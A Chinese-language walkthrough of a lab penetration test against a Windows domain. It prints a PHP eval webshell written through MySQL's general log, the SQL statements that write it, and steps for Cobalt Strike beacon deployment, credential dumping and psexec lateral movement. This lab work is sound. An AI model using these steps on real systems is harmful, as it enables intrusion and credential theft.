准备工作:
启动win7的phpstudy:
Win2k3和win2008均能成功访问:http://192.168.52.143
外网渗透:
信息收集
1、Kali利用nmap发现到win7的ip:
nmap -sP 192.168.114.0/24
2、扫描该ip的端口,发现了80端口和3306端口开放:
nmap -sS -sV -T5 -A -p- 192.168.114.129
3、访问:192.168.114.129:80,发现是一个phpstudy 2014的探针文件,通过php探针获取到了网站的绝对路径:C:/phpStudy/WWW
4、测试MySQL数据库连接,尝试利用弱口令进行连接(经过测试发现用户名和密码均是root):
5、利用dirb扫描目录:dirb http://192.168.114.129/
6、发现phpmyadmin,尝试访问,浏览器输入:http://192.168.114.129/phpmyadmin/
7、利用上述检测出的用户名和密码尝试登录(均为root),发现成功登录并得到了一些关键信息:
外网渗透
1、通过修改日志文件来GetSHELL
点击sql执行语句show variables like '%general%'; 查询日志信息:
2、打开general_log日志读写功能,SET GLOBAL general_log='on':
3、再次利用show variables like '%general%';语句查看成功打开了日志文件的读写功能
4、利用SQL语句创建文件:SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'
再次查询show variables like '%general%';
5、因为日志文件会记录错误的SQL语句,这里尝试写入一串错误的语句:select '<?php phpinfo(); ?>'
浏览器访问对于网址:
6、尝试上传一句话木马 SELECT '<?php @eval($_POST[passwd]);?>'
7、打开蚁剑尝试连接
成功连接
8、打开虚拟终端发现,该主机有两个网卡,且存在域环境god.org
内网渗透
准备工作:
1、将cs工具包解压后放入kali中:
2、进入cobaltstrike4.0文件夹,运行./teamserver 192.168.114.128 654321 启动服务器:
3、再次运行命令行启动一个客户端:./start.sh :
4、输入密码654321.然后连接
5、将CS的其他插件集成执行操作如下:
添加插件后,发现其内网渗透工具明显增多
提权选项增多
开始进行内网渗透
利用CS工具生成木马:
1、在CS的监听模块中点击添加,点击保存
2、根据该模块生成木马,操作如下选择attacks,选择packages,选择第四项:
3、因为上述获取到被攻击者是64位,这里需要勾选X64,点击generate即可
4、生成在当前路径即可:
5、打开文件夹管理器即可查看到该exe文件
6、将其复制在物理机中,不要点击运行,利用蚁剑上传文件到被攻击者上即可
7、上传成功后,利用蚁剑工具进行执行该1.exe文件,通过CS工具发现已经成功感染目标主机
8、点击被感染主机,右键interact
9、由于这里设置了延时,先取消其延时时间;输入sleep 0 ,待41s走到60即可马上开始执行命令了
10、可通过shell + 命令名执行:如shell systeminfo
11、查询当前在线用户:shell query user || qwinsta
12、进行提权操作:依次点击如下
13、这里成功获取到了一个系统权限的system用户
14、设置延时为0后,查看shell whoami
15、通过system的账户执行net view 查看域内共享文件
点击如下按钮能查看到内网的相关信息
点击如下按钮能查看到图形化界面:
16、利用system用户嗅探内存中的密码及其哈希值相关信息,对目标机进行端口扫描,操作如下:
17、扫描到了域中信息的明文密码
18、点击下面按钮能直接查看到嗅探到的相关信息(账号密码。域信息)
19、设置smb监听,操作顺序如下
注:这里第一次选择的是psexsc没有成功,第二次切换的psexec64进行测试,然后成功感染域中主机
20、配置如下信息:
21、选择system权限的用户(需要利用其当作跳板),点击launch
22、发现目标主机已经被感染即成功渗透:
23、打开其shell窗口
24、设置延时为0,然后输入shell systeminfo查看信息
25、对于另外域中另外一台主机利用同样的方式进行测试(这里可以设置不同的域管理员账户信息尝试):
26、该域中另外一台主机也成功感染
27、可利用shell systeminfo获取相关信息
28、点击图示标红处,显示内网主机的相关情况